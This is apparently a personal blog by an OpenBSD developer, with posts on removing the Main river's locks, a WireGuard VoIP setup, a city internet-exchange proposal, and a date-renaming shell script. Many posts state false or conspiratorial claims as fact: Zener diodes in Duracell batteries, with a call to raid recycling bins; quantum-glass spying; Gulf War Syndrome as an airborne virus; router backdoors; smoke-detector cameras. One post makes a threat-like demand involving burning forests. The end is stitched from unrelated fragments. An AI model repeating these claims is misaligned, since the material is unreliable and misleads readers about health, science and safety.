My case is an open letter to E.ON (the energy company). The Main river
produces nearly 120
Mega Watts of electricity. Most the locks in the Main were installed
between the 1930's throughout the 1960's. It is my intention to dismantle
all the locks.
This has several benefits:
Eels from the North sea can lay their eggs and sperminate in the Main again.
Barge transit will be faster in general even when slowing down their speed
The river will restore itself to something it was hundreds of years ago
New technologies can still produce energy (artificial river grass that generates electricity in the current))
People who own boats that are ocean going could drive all the way to London, Thames River, without hassle without a tax
The drawbacks:
Night time energy is not guaranteed, but with battery capacity it is probably manageable
Flooding hazards? Perhaps one has to look at a river system none other than the Rhine River on how they manage that, I have seen several levies in the vicinity of Mainz with flood canals
Is it even manageable? It is a major project for this region!
120 MW + buffer energy has to be produced to make up for the electricity lost (balkonkraftwerke?)
All over the planet that we call earth people are ripping out dams in order to
reproduce the ecosystems that rivers created 100's of years ago. This is
something to strive for, locally.
Save the River Main!
August 03rd, 2024
If you've been living in Franconia (like me, > 30 years in total) you may
have noticed a sick dynamic in the region. The region is stagnate, dependent
on sick practices of industry. After the mass lay-offs in the 1990's many
people were forced to leave this region or live a life of poverty.
Part of the stagnation in this region is due to a dying/dead river system.
The river isn't even a river in most parts... there is no current.. no life.
It is my intent to tell people to dismantle all the locks and dams on this
river in order to restore the dynamic that once existed here. The fish will
come back!
Pretend the River is the soul of Franconia. In the body there is seven main
energy points called chakras. Before we stray too far off plot here, pretend
that activation of all seven chakras puts the body into an orgasmic state of
life. This is what I want for our river! This is what I feel we owe to this
world!
So let me get you some figures that I think should benefit us as a people, if
we break the dams and let the water take its natural course.
Fish that we haven't seen in 100 years will return. If not them, other
fish that we never saw before may come.
With fish there will be other wildlife that benefits, eagles, geese, etc.
People will be much happier seeing a river that flows instead of stagnate
waters
Now to support this effort we have to grab some modern technology in order to
point out that the river is unworthy of being dammed for hydro electricity.
Let's pretend the river is 500 km long. In previous estimations and facts
I added up the capacity that this river produces is 120 Mega Watts or there
about. This is roughly 240 Watts per meter of river. This is huge waste!
Installing a solar panel on each side of the river (vertical) will give a lot more energy when
the sun shines judging by panels that are 20% efficient at 1000 Watts per
square meter. Since you have 2 shores to a river that adds up to 400 Watts per
meter of length of the river.
How is this not good? I think it's brilliant! Also the energy has to be
stored somehow, for night time, this may be a bit of a scratch-head factor.
However we should not hold on to an inneficient river system that produces
trickles of electric power at night just for allowing someone to run their
computers 24/7.
My phone works again
August 5th, 2024
Since a long time my phone was down. I was just too lethargic to fix it.
Now it's working check callpeter.tel.
Do find a good reason to call though. Offering me a job perhaps would be
nice!
The working phone setup
August 6th, 2024
The high speed links that we have in Germany as VDSL allow us to use the
powerful routers that are common, to create a phone switch for the entire
family even though the family lives far apart.
This is my setup:
+-----------+
1. |UAC (phone)|
+-----------+
|
+-----------+
2. |mngd switch|
+-----------+
|
+-----------+ +------------+
3. |OBSD Router|===== wireguard tunnel =======|OpenBSD VPS | 4.
+-----------+ through Internet +------------+
| ||
+-----------+ ||
| VDSL modem| || Wireguard
+-----------+ || Tunnel via
| || Internet
"The Internet" ||
||
||
+-----------+ +------------+
"The Internet"-------| Telco DTAG|---------|Fritz!Router| 5.
+-----------+ +------------+
It starts off with a Grandstream VOIP phone that is connected to a switch
It's IP is 192.168.xxx.2
The switch has assigned the phone port to be vlan #3
The OpenBSD Router then does a number of things before sending the VOIP
packet on.
First it uses divert-packet pf rule to send the packet bound for
port 5060 (UAS) to a proxy that I wrote called
sipdiv.
This proxy compresses the packet before sending it on because
naturally the wireguard tunnel would not be able to fit it.
Next it translates 192.168.xxx.2 to 192.168.199.yyy
Then it routes it to the OpenBSD VPS via the wireguard tunnel
Returning traffic is destined to 192.168.199.yyy and gets routed
to 192.168.xxx.2 and translated back to 192.168.xxx.2
The OpenBSD VPS has 2 wireguard interfaces (one for my home wit the UAC,
and one for my parents home with the UAS). It will also NAT the
192.168.199.yyy packet back to 192.168.xxx.2 where 192.168.xxx.0/24
is the net range of the wireguard tunnel leading to the AVM Fritz!box.
Returning traffic is translated back to 192.168.199.yyy
The AVM Fritz!Box 7590 at my parents house with a high speed VDSL link.
AVM recently replaced their gif tunnels with wireguard tunnels, it
is possible to set this up to connect to an OpenBSD box. The OpenBSD
facing wireguard segment is 192.168.xxx.1/24. The Fritz!Box does not
allow routes to be set towards the OpenBSD box so that's why we had to
do the NAT dance above.
Here I have all the functionality of the phone, including answering
machine. I used one of my parents auxilliary numbers (not the main
one).
I hope this makes sense to you, I don't think there is a limit to wireguard
tunnels and phones you can have on a fritz!box. Have fun making a phone
switch for the entire family!
UAS stands for User Agent Server and UAC stands for User Agent Client, it is
a VOIP term. Also I limited the codecs to PCMA/PCMU (it sorts out to use
PCMA) which is a good enough quality and cheap but not compressed. Making the
RTP (voice traffic) work took a bit of debugging. Once this setup is set up
it should not move much anyhow. I broke it at one point because I put another
AVM router on my side (not needed). Debugging tools I used were ktrace/kdump
and tcpdump.
Open Letter to City of Schweinfurt
August 13th, 2024
Date: Tue, 13 Aug 2024 11:17:56 +0200
From: Peter Philipp
To: info@schweinfurt.de
Cc: 2 more parties
Subject: Idee fuer ein Internet Exchange in Schweinfurt
Hallo Ihrerseits,
Ich habe ein 8x (acht 10 Gigabit ports) Switch
(https://blog.centroid.eu/c?article=1698481343) den ich falscherweise vor 6
Jahren gekauft hatte. Es hat ein wert von 800 EUR. Ich wuerde Sie bitten
eine Studie in Kraft zu setzen ob es moeglich ist ein Internet Exchange in
Schweinfurt aufzubauen. Ich wuerde meinen Switch dafuer frei geben/spenden.
Initial, ein Internet Exchange in eine Luecke im Rathaus wuerde einen zentralen
Punkt darstellen wo sich Industrie, Stadt, Gewerbe und Vereine austauschen
koennen. Die Idee ist nach dem Toronto Internet Exchange (https://torix.ca)
gestaltet, die damals von einem Herrn Jason Lixfeld gestartet wurde. Damals
hatte Jason einen Cisco switch in einem vernetzten Gebaeude bereit gestellt
und Mieter von dem Carrier Hotel haben ihr Ethernet Kabel ruebergeworfen
(war ein bisschen mehr aufwendig als das).
Ich wuerde vorschlagen Die volgenden Abnehmer fuer den Internet Exchange zuerst
durchzuschalten.
1. Gross-Industry (https://www.schweinfurt.de/en/business1/companies2/6161.Who-is-already-in-Schweinfurt.html)
2. Akademia (https://www.thws.de/, Volkshochschule, und viele mehr)
3. Vereine und Telekoms (https://freifunk-schweinfurt.de, DTAG)
4. Klein und Mittlere Unternehmen in der Stadt, (https://www.gribs.de/)
5. Vernetzung zu Wuerzburg fuer initialen Wuerzburg-Schweinfurt Internet
Exchange.
6. Vernetzung zu Nuernberg fuer Fraenkische Cross Internet Exchange points.
(https://www.n-ix.net/)
7. Stadtwerke und alles um Staedtliche dienste. (https://schweinfurt.de)
8. Administrativer Port fuer Dienste wie (VPN beschleunigung, route-server,
NTP und DNS server, alles was so ein IX ja halt braucht).
Der erste Ansatz kann mit diesem Switch gemacht werden bis ein mehr
geziehltes Konzept entwickelt wird. Ohnehin wird die erste richtige
Investition in die 1/10 gigabit links gehen (das wird finanziert von den
Peering Partnern und bereit gestellt von der Stadt).
Die Idee ist diesen Internet Exchange in neutralen Haenden zu halten was
demokratisch ist und die Menschen von Schweinfurt representieren. Es ist
bestens ein Verein hierzu zu gruenden.
Halten Sie mich auf dem laufenden!
-pjp
--
** out of spiffy .signature messages
OpenBSD repo (with my own branches)
August 14th, 2024
I've uploaded the OpenBSD repo to my gotweb. It contains several branches
where I dabbled in the kernel dating back to about Y2K, which is around
OpenBSD 2.7 time.
In the short term future I'm going to upload more git repos. For my "trial"
sources, which I used to learn system calls and concepts.. tested things. All
dating back to 1996. Keep a lookout on
gotweb.delphinusdns.org, maybe
you'll find some code that you like. I never managed this code much in a repo
but kept it in my sources. Much of it is broken or never completed... as a
sysadmin (when working) there wasn't really all that much time. And since
2006 my delphinusdnsd took up most of it.
New Satellite Broadband in the Arctic
August 15th, 2024
This is intriguing! It should make arctic
circle nations such as Alaska, Canada, Nunavut, Greenland, Iceland, Svalbard
and Scandinavia pretty happy! Congrats!
Canada's 5% where are they?
August 16th, 2024
When I speak of Canada's 5%, it's an exclusive club of immigrants that lived in
Canada some time being accepted as an immigrant between 1986 and 2023 which
amounts to 9.5 million people, and have left Canada at some point in time. I
myself being a 5%'er here. Leaving Canada for me meant a collapse in finances
but a rich wealth of spiritual gifts, new perspectives, new ways to do something
and a lot of time.
In total the 1.6 million (which is 17.5% of all people who migrated to Canada
either willing or with their families) have excellent education, excellent
point of views and excellent behaviours. But you most likely struggled in
terms of opportunity somewhere else in the world. I would like to say,
I'm with you. We have the same course of lifestyle. It's a shame we can't
network and start a community together.
BTW did you know Canada has only 11% of its land available for citizens and
immigrants? This may be the reason many of you left when you found out that
"crown" land is not to be touched by anyone. This really makes Canada which
is really a 5000 km strip by 200 km northwards comfy at place 30 in the world,
after Mali (1 million sq. kilometers).
Anyhow there 1.6 million of us, dispersed around the world. I'd like to meet
you but this is next to impossible. Keep strong brothers and sisters! It'd
be funny if we built our own community together and outdid everyone. Ahh
that is just a brainstorm! Other opportunities may exist!
Tighten all hatches tonight!
August 16th, 2024
In Schweinfurt (Schwanfurt) region there is a destruction of the ex-nuclear
power plants towers at 18:30 (that's 6:30 PM). They are collapsing these
cooling towers (minimal radioactivity, 2nd tier cooling), with explosives.
However if you are like me you'll keep the windows closed for the next 48
to 96 hours as it will kick up some minor radioactive dust most likely.
Don't worry too much but you can live with the windows closed for 2 days
can't you? Wait for the dust to settle.
Some thoughts on the Main River Restauration idea
August 25th, 2024
In this article
I wrote of undamming the Main River system. Here is some more info as I
researched it.
The River Main has a discharge similar to the River Avon in England, and if
you look on this River System it doesn't seem big enough for barge transport.
So in order to "not waste" the efforts of the Rhine-Main-Danube Canal a study
must be done evaluating the depth of the river after removing weirs and locks.
As well as the width. Feasibility studies people! Feasibility studies!
The river if let it's natural course, will need floodplains (in German
Auen) to take on the hazard of flooding and neutralize the effects, so that
what is happening on the Danube in Southern Germany doesn't repeat itself in
Northern Bavaria. I had the idea of using hybrid PV (solar panels) and
agriculture for this area, The solar panels can be put on Pontoons floats so that the
grid is not affected when a flood occurs. The crop on flooding agriculture
in that same area is usually a write-off (unless it floats too!).
The Main is said to discharge 200 cubic meters per second on average into
the Rhine river, I think this is similar to a swimming pool
.
Finally I'd like to say that we as a civilization are learning. We understand
that what we did in the last few hundred years was not the right way, we have
to improve, in order to give us more quality of life. There is work to do!
Morse Code
August 25th, 2024
I'm interested in learning rudamentary Morse code. I have fantasies of
communicating in my bed with a partner via some sort of signal. Unfortunately
my Morse skills do not go beyond - - - ... - - -, and I usually have a
confusion with ... - - - ... *shrug*. I'd be particularily interested to
get to know single female signals officers who want to teach me.
Update: This would make signals people posing as hookers and escorts
pure data hubs. The more people you exchange juices with (and morse) the
more a message travels... and you can be selective on who gets a certain
message (under cover *wink). I personally don't want to go that route, it's
adultery, but you know...just a thought!
My Brainstorm from last week
August 25th, 2024
It's worth it for me to write down my ideas. So here is last weeks
train of thought. I was researching Quantum Entangled Erbium dopants in things
such as glass (as produced by companies such as Schott and Corning, think
gorilla glass). Major Monitor (based in Asia) makers could develop monitors
with these sheets of glass that are quantum entangled and thus need no
detectable backchannel to the spies. Special machines piled in underground
tunnels somewhere near Seoul and Beijing, use OCR to translate all content
to grepable (searchable) text. The problem with this is that you cannot
produce something so stable as engangled on Erbium on glass........ or can you?
So this is a threat in the Quantum Age. It will take research to detect the
entanglements on mediums such as glass, or paper. Other than that...it's not
detectable, doesn't require radio wave or Internet packet back channels.
And hacked devices can have
a 1 way IP channel can be even created on changing the pixels via steganography
on the subjects monitor (think jpeghide). How do hackers then protect them
selves from being found and detected? Stop using the monitors! Voice
interfaces are kinda cool, Braille displays may work but ultimately you should
be in the best position when you develop your own monitor device. This was
taught in 1995 at Colleges in Canada (how does a CRT work), but it took only
5-7 years for CRT's to be discarded in favour of LCD's with the "promise" of
no TEMPEST hackery. Yeah and my name is Hans and this is my brother Franz
we're here to POMP you op!
Update: This could also be used as a layer of protective glass on Solar Panels
I wonder if PV's would be able to "steal" light from panels half a world away
that is currently in the day. Meaning...the panels could produce electricity
at night even! Possible? I dunno I only am wondering, you are the experts!
How to delogo a movie with ffmpeg
September 1st, 2024
Uhm... forgot which tarot reader on Youtube was requesting how to delogo
tik tok logos on their videos. I have a rudamentary way to delogo a sample
file. This is the string using the program "ffmpeg" found on linux and BSD's.
This way you can easily convert your tik tok videos to youtube without getting
sanctioned by youtube.
Caveat there is some loss of quality on my result "processed.m2ts" however you
can work on bettering the quality with more commands "ffmpeg-all" manual page.
Let me give you a slight breakdown of the commands: x= x-axis, y= y-axis of
left upper corner of the area you want to delogo. w= and h= is the respective
height in pixels of the logo you want to remove. To fine-tune this area you
can add ":show=1" to the -vf delogo option and it will paint the area outlined
by a green line so that you can find the position of the logo.
I wish to see your videos converted from TikTok to Google! God bless you!
I'd like to give a warm "thank you" to Mrs. J. Coleman who told me over 35
years ago that after 20 years you're a virgin reborn (she also wet willyd my
waxy ears!). I waited 27 years in celibacy to become a virgin again! Thanks!
I coulda saved me a lot of sexual frustration! Uhm in all honesty I'm
grateful for this Mrs. Coleman, because I didn't catch an STD being
promiscuous for the first 5 years since losing my virginity (to someone else).
Looking for a supply of Zener diodes?
September 2nd, 2024
Zener diodes are said to provide a fairly good source of entropy when you
hook it up to a computer as a source of random numbers.
In this court hearing
in McDermott (serial killer) vs. the state of Massachusetts, the accused
admits that as an employee of Duracell for 8 years that these contain a
Zener diode. So if you ever need a supply of these without ringing bells in
the security aparatus, you could just disect batteries of the duracell type.
Please be very careful with opening alkaline batteries!. Also if you
are raiding supermarkets in Germany for their 2nd hand batteries that they
accept for recycling, you have to do it systematically on the same day at
as many supermarkets as you can. The reason being is that it will be outlawed
the next day to disect duracell batteries for their 2nd hand zener diodes. So
you got to act organized and quickly before it becomes illegal. Thanks Peter!
I love talking!
As an aside. While $10K USD for a submariner in 1978 in todays money (48K USD)
is somewhat ~okay~ it is not nearly adequate to this dude who knew the
USS Narvhal (A sturgeon class attack submarine, forerunner to the LA class).
inside and out. The military complex of the USA must realise that extremely
bright individuals might get disgruntled with such a low salary and open up to
stupid decision making (such as 30K bribes by foreign countries for how the
pumps of a nuclear submarine work electronically). You're not a bright bulb
if you sell secrets to major powers in the world for just a few thousand
dollars. I feel bad for McDermott as a person who was brushed aside as bright
but exploitable by even the US Navy, but I have no remorse for his actions.
However get this... he said he bought the AK-47 which was the murder weapon
that killed seven co-workers because of a law that made the sale of assault
weapons illegal in Massachusetts. I'm fully convinced that McDermott believed
in everything the way he was supposed to. He was a devout christian and
believed when Arch Angel Michael spoke to him to prevent the murder of six
million jews, by killing just 7 Nazi's including Hitler in the Reichsbunker.
He also was a devout American and belived in the Constitution of America who
writes the right to bear arms as a US citizen. He did everything right.
Except for the contradiction of "second guessing god" who told him to murder.
Had he no access to the AK-47 that he bought so quickly, one day before the
sale was illegal, he might have ended his grudge with just a fist fight. It
might have saved 6 peoples lives. I say six because it is possible to kill
people with your hands if you're deemed a "weapon" such as having a black belt
in Karate or have other training such as Navy Seals training. This is my
opinion not facts. But if it interests you I gave you the link above to the
court hearing. Make up your own mind and conclude wether the prevention of
McDermotts sale of an assault rifle could have prevented deaths.
This is for my naive people!
September 2nd, 2024
How should you react when finding out that you are being surveilled in a
world laden with privacy invasions from all sides? Take the example from
our local Aliens and foo fighters. They usually ignore all sorts of attempts
to make contact by such entities such as the US Navy, Air Force and others.
So to emphasize this... ignore them! One great excuse to the cameras in your
smoke detectors, to your spouse and significant others is to "give them a
good show!". You will surely draw their jealousy very soon, and when you
reach a tipping point of jealousy the cameras will magically disappear. Next!
The No-go approach is to get flustered up and hurt. If you fall for this trap
they'll suck your good energy until you die of paranoia in an institution.
Never mind the bollocks... here is the Sex Pistols!
Ozone layer in danger, adjustments could save 100 million lives+
September 10th, 2024
Remember that Ozone hole from the mid 1980's? We are facing a dire situation
with satellites that burn up in the atmosphere and cause gaseous aluminium
oxide (al2-o3), which acts as a catalyst according to this
Canadian Broadcasting
Corporation show "About that" hosted by Andrew Chang.
My open letter to all citizens that are humans on this planet is to get in
contact with your government representatives and in turn contact the United
Nations to indicate that we as a global community are concerned about the
SpaceX company
Starlink
which plans on deorbiting up to 40000 satellites every
5 years (at exhaustion of the satellites steering fuel) on average. Furthermore the immedate problem at hand is *not* the satellites but the
International Space Station
that will be a huge contributor of al2-o3 in one single deorbit as approved
by FAA and NASA and contracted to SpaceX on a 800 million USD mandate.
I have personal bias here since I was told I contributed to the manufacture of
fasteners (screws) of possibly the truss section of the ISS. However, that
aside. When you find out about the potential Chlorine atoms that are in the
stratosphere and never having a chance to break down, it will kill our ozone
layer (O3). This ozone layer protects humans and other life forms on earth
from things such as skin cancer, serious eye problems, etc etc.
It is my suggestion to immediately stop plans for the deorbit of the ISS, and
work out a plan on raising its orbit to a "grave yard" orbit which is somewhat
beyond a
GEO
orbit (at 36000 kilometers above the equator). Since the ISS
has an inclination since launch it is difficult to raise it up to this
altitude but in my view it is possible to straighten the inclination to an
equatorial orbit and then raise the altitude to a graveyard orbit.
With my rudamentary calculations it should be possible to correct the orbits
of the ISS slowly over much like the
SMART-1 demonstrator of
the European
Space Agency which managed to move a satellite from Geosynchronous Transfer
Orbit to impact the Moon by means of an Ion-electric propulsion. It is my
suggestion that SpaceX get in immediate contact with the
Ad Astra Rocket
Company founded by retired NASA astronaut Franklin Chang-Diaz who has
been developing new technology for Mars-bound spacecraft called the VASIMR
ion propulsion drive.
Once the ISS is in a
graveyard orbit it will not be able to return to earth for hundreds of
years.
In regards to the other threat of Starlink Satellites returning, I envision the
new Starship from SpaceX to open it's bow much like a whale feeding on
krill
*picture following copyright dispute* to collect starlink satellites much the
same way as they were launched. It will suck up the satellites like Krill and
return to earth not burning up on re-entry due to its heat shields.
Final statement: It is the NASA and USA's responsibility for all 7 billion+
earth humans and citizens as well as all life that is affected by ultraviolet
radiation (such as bleaching of the great barrier reef in Australia) to avert
a disaster that could possibly save hundreds of millions of deaths. If you
read this message, please treat it with high urgency. We must stop all
deorbit burns into our collective atmosphere to prevent much suffering for a
large chunk of life on earth.
Also, I am very happy starlink exists, but it needs tuning. Life on earth
has higher priority in this case.
Gulf War Syndrome
September 14th, 2024
I wrote this on the talk page of wikipedia:
Airborne Virus?
Looking for people near US Military facilities who have never had contact
other than short term contact with soldier families that display symptoms
of GWS, confirming a plot of it NOT being a sarin gas but a virus that's
airborne. I'm a civilian that went in and out of Military communities at
Ledward Barracks and Kaiserslautern Barracks and I notice skin problems
and neurological damage much similar what is described on 1st/direct
contact of soldiers. Ramstein Hospital is not far from Kaiserslautern
and ever since visiting the sites of where Shaquille O'Neal played
Basketball I've been experiencing symptoms back in Canada. Symptoms
are/were difficulty concentrating, confusion, seeing floaters in the
eyes. It as manageable until relocation to Ledward Barracks where no
physical contact was made but the skin discolourations started happening.
Please reply privately at gulfwardeath (at) callpeter (dot) tel, I've
witnessed many other people having these skin discolourations as well
as well as ugly looking scabs near Ledward. No way home. Preceding
unsigned comment added by
I'm thinking if people who were close to me but never had physical contact
such as sweat (such as on basketball pick up games, or sexual intercourse)
you may be spared. People who played ball with me and had sex with me and
you have these symptoms please mention this. And I'm sorry I didn't know.
Please mention this to your physicians. You're not insane. You're a victim
of Sadam Hussein/H.W. Bush Desert Storm/Desert Shield. Other soldiers
involved in this military operation in 1991 did you find that your families
and closed ones also had these symptoms? How about NBA basket ball players
who had close physical contact to Shaq. Do you feel these symptoms? It's
been 30+ years since 1992/1993 when I was at Kaiserslautern Barracks playing
a pick up ball game with military families, I have photo album evidence that
I was I was in Germany at this time including time stamped Berlin Wall
Grafitti. I am sorry for being a carrier, but I'm not guilty of this.
US and ally governments it's time to let us know what happened here! Please
be honest we can take it the psychiatric systems was the most scary thing
anyhow.
Related to last post (Gulf War Syndrome) Ankerzentrums SOS
September 14th, 2024
Here in Germany when the US Military left, the Ankerzentrums were refitted
to house Refugees. I was just reminded by a song a few minutes ago which
talked about the "7 miles of black star liner" which is a concept proposed
by Marcus Garvey in NYC before he was deported to Kingston Jamaica.
There is associations to this flag "biafra flag" which I saw in documentaries (in german) about
these refugee camps search "ankerzentrum schweinfurt". Basically Nigerians
are holding up this flag amid tensions in the Refugee barracks. The german
opressive refugee system do not understand (they want to help, but can't
fathom that there is a virus) that these people are possibly
infected by the same Virus of Gulf War Syndrome causing them to become sick.
It is a plea by them holding up the Biafra flag, in my opinion, to seek
representation by the ambassador of Nigeria to Germany to take them home or
in better living conditions. Everyone is getting sick.
Since the Amazon rain forest is burning anyhow: request for truce
September 15th, 2024
You may remember the Bob Marley lyrics of "No Woman No Cry". Why was Georgie
making the fire light? Why were they burning "black" wood aka mahagony?
This is a very magical precious wood that originated in the woods of the Congo
and somehow similarily found its way to Brazil and Maya civilization (as well
as jaguars and pyramids).
So I'm giving you material for collateral. Free all my people that are
prisoners, men and woman (black and white) or my people start destroying
all black wood in the world. These are ancient weapons of mass destruction.
And by the way you can keep me. I'm gonna die soon anyhow.
Black people. There is reports of a "black" man going around killing people.
You know this is not true. In fact it is black magic. Someone is behind a
mahogany black mask of magic. Anyhow... I figured it out. You figure the
rest. We have the technology of LASERS which can burn down black wood forests
all over the world. I think my people will be freed. But keep me behind what
is life without Jah Jah anyhow?
Anyhow the clock is ticking. I'm pretty sure fires will quickly die down and
the plant Marijuana will be protected as one species of 300,000 plants just
as well as Mahogany species of wood. It's a stale mate. Thank the variety
of plants out there. They may just stop world war 3. Rejoice. Don't think
of me any further. And in all in memory of Tupac, Bob Marley, etc etc.
Peace!
I hate to be a man of war, but enough is enough. It's time to embrace peace!
Exposing hypocritical TV (claiming to be associated to "God")
September 15th, 2024
Here is a list of TV Cable Channels in Germany (about 65% worth of all available
channels) that DO NOT have closed captioned for the deaf.
As you may know Germany is a very christian country. You may also know if
you've gone through the court systems (perhaps as a witness) that all judicial
court rooms have christian crosses in every room. Also pointing out that
there is no seperation between the Church and State (but that's another matter).
It struck me as odd then.. that all christian outlets were NOT offering closed
captions, what do the deaf have to read your lips to get the word of god?
It is so unethical and NOT the following of god. In fact a christian always
stood for the values of protecting the weak and disabled. So hypocritical
lies and bigotry exposed.
RTL
Prosieben
tele5
Nitro
sixx
3sat hd
eurosport 1
welt
1-2-3 tv
qvc2 hd
sonnenklar.tv hd
hse extra hd
arte hd
shop lc
shop lc hd
hse trend
jewelo tv
qvc style hd
servustv
tageschau24 hd
tv mainfranken hd
bbc news eng
ard alpha hd
hope tv
cnn eng
anixe+
tv5 monde
channel21
tlc
servustv hd
hse hd
qvc hd
home & garden tv
nickelodeon
n24 doku
cgtn
k-tv
comedy central
qvc
dmax
voxup
hse
disney channel
mtv
nhk world-japan (eng)
rtlup
schlager deluxe
bibel tv
superrtl
vox
ntv
al jazeeran int (eng)
sonnenklar.tv
sport1
toggo plus
kabeleins doku
qvc2
hse extra
prosieben maxx
sonlife eng
deutsches musik fernsehen
deluxe music
sat.1 gold
astro tv
cnbc europe (eng)
You may also be interested to know, that it takes about 500 dollars to buy a
Computer at FutureShop or Media Markt that has up to date hardware to run a Tensor
like program to interpret speech to text for closed captions. So...
where are we here? These outlets are nothing more than outlets of the devil.
They don't represent christian values, they claim to be "bible", "hope", etc.
But in the end they want to exclude humans that they preach to help.
Also I refuse to pay my GEZ (not a christian outlet) bill with the Tagesschau
24 HD and ARD Alpha HD. These are NOT private channels but are supposedly
covered by Public funded "Oeffentliche Sender". All the other public funded
channels have Closed Captions (aka subtitles) except these two. Why?
It again shows a contradiction and I refuse to pay any further. Let's start
a class action lawsuit in a Bavarian Court and start pointing at the Cross
that is so proudly hanging there to show this is a Christian Court.
Anyhow/Anyways. What do you think the monthly costs are for having a Cable
TV channel? I would imagine these fees are much much higher than 500 dollars
it would take to buy a computer at Futureshop to provide closed captions.
Conclusion: These are wicked entity channels that are ultra greedy and don't
give a hootin' Eff about your God!
Pinocchio your lies grow! (Lies beget Lies)
September 17th, 2024
I usually don't quote the Bible, but in this case the King James bible will
do for the moment.
Proverbs 12:19 KJV
19 - The lip of truth shall be established for ever: but a lying tongue is but
for the moment.
I have owned these TP-LINK WR-841N routers for 7-8 years and today I opened
one. Inside are NOT Communist parts but rather a clone from Taiwan.
Conclusion: NSA and captitalist pigpen backdoors included.
#!/bin/sh
#set -x
for i in *.html; do
a=`grep small $i| head -1`
DATE=`echo $a | sed -e 's/\//g' -e 's/\<\/small\>//g' | grep 20`
if [ "X$DATE" = X"" ]; then
echo skipping $i
continue;
fi
NEWDATE=`echo $DATE | sed -e 's/[snrt][tdh],//g'`
case $NEWDATE in
January*)
MONTH=01;
;;
February*)
MONTH=02;
;;
March*)
MONTH=03;
;;
April*)
MONTH=04;
;;
May*)
MONTH=05;
;;
June*)
MONTH=06;
;;
July*)
MONTH=07;
;;
August*)
MONTH=08;
;;
September*)
MONTH=09;
;;
October*)
MONTH=10;
;;
November*)
MONTH=11;
;;
December*)
MONTH=12;
;;
esac
YEAR=`echo $NEWDATE | sed -e 's/.*\( 20[0-9]*$\)/\1/g'`
DAY=`echo $NEWDATE | sed -e 's/^[A-Za-z]*\ \([0-9]*\)\ 20[0-9]*$/\1/g'`
case $DAY in
[1-9])
DAY="0${DAY}"
;;
esac
NEWNEWDATE=`echo $YEAR${MONTH}${DAY}`
TIMESTAMP=`date -j +"%s" ${NEWNEWDATE}0000.00`
echo $TIMESTAMP
while [ -f $TIMESTAMP.xhtml ] ; do
TIMESTAMP=`expr $TIMESTAMP + 1`
done
mv $i $TIMESTAMP.xhtml
#echo $MYDATE
#echo $NEWNEWDATE
#echo $NEWDATE
done
As some of you may know I'm the author of the Wildcard DNS server. I read
the
following words from Nominum:
"Open Source DNS a Recipe for Problems".
And I have to disagree to this somewhat. But when looking at my own meagre
DNS server, there is a few areas of concern. First, my server wasn't meant
to be put on the Internet when I first wrote it close to four years ago, but
it's functionality allowed it to be run as an authoritative nameserver.
I have been serving the centroid.eu zone with it and continually studying
the logs of it and I'm happy to report that my server was never killed from
remote, I never had to restart the server. I'm surprised that it works out
to be fairly stable.
In this picture I believe you see DJ Wigs who does a drum-bass and jungle show.
All in all the people who make SVPradio happen are great and the shows are
always interesting. We always wanted to have SVPradio since our teenager years
and the name "SVP" was picked back then as well. What it stands for I'll leave
to your imagination as we don't want to reveal that yet. One fitting acronym
is "Stratford's very pretty". I'm looking forward to the next 20 weeks and
perhaps our listener volume will increase too.
This particular billboard is found in Kansas City, USA.
Free Bradley Manning!
Here is a picture I took of a blackbird in Schweinfurt a few years ago during
winter feeding on my parents porch. They were cheerful birds always singing
very loud and getting on someones nerve while I was programming. But now
that it's all silent, I kinda miss the dang things. May you have better
fares in the place you are now!
I know Buju Banton is a resistor! Hang in there sir! Free Buju Banton!
Today marks the one year anniversary of
SVPRadio, Stratford, Ontario's
underground radio station. It streams from 6PM to 12 Midnight every
wednesdays to people who can receive online radio. I have been given
some inside photos of the studio and people involved.
Hello Autumn!
Today OpenBSD 5.2 gets released. Because it is headquartered in Canada the
announce may come a bit later as here in Europe we're a few hours ahead of them.
Here is the release page, it has
all information that you need to download or order OpenBSD 5.2. I personally
have used and bought OpenBSD since the 2.5/2.6 days where my personal OpenBSD
workstation was called geeklab.globalserve.net in 1997. Today OpenBSD is much
more secure than it was back then which is good since OpenBSD focuses on
security (but not just! but also functionality and openness). Why is it
important to be secure, yet functional? Well when you're faced with securing
something often you disable the service completely which is the opposite of
functional. In OpenBSD services are secured by a multitude of attack prevention mechanisms. You may want to look at strlcpy/strlcat which was among the first
changes that OpenBSD did. And then there is W^X (W xor X) and ottomalloc which
are supposed to prevent stack and heap overflow attacks. Before I bore you,
I'll just say "It's celebration day!" and leave you with that. Finally congrats
to the OpenBSD'ers who made it all happen.
![[Valid RSS]](graphics/valid-rss-rogers.png "Validate my RSS feed")
Enjoy.
this one is right.
what's up with the "powerpc"? OpenBSD/macppc hasn't been called powerpc since
3.0 release. Furthermore this CD does not get accepted by a PowerMac and it
spits it out, like it would with a CD-RW. I find this highly odd and I wonder
if I got the right CD's here? Worthless plastic.. even for doing some console
work! Who swapped my CD's?
m-gogh.png)
_surfaced_in_Arctic_-_1959.jpg)
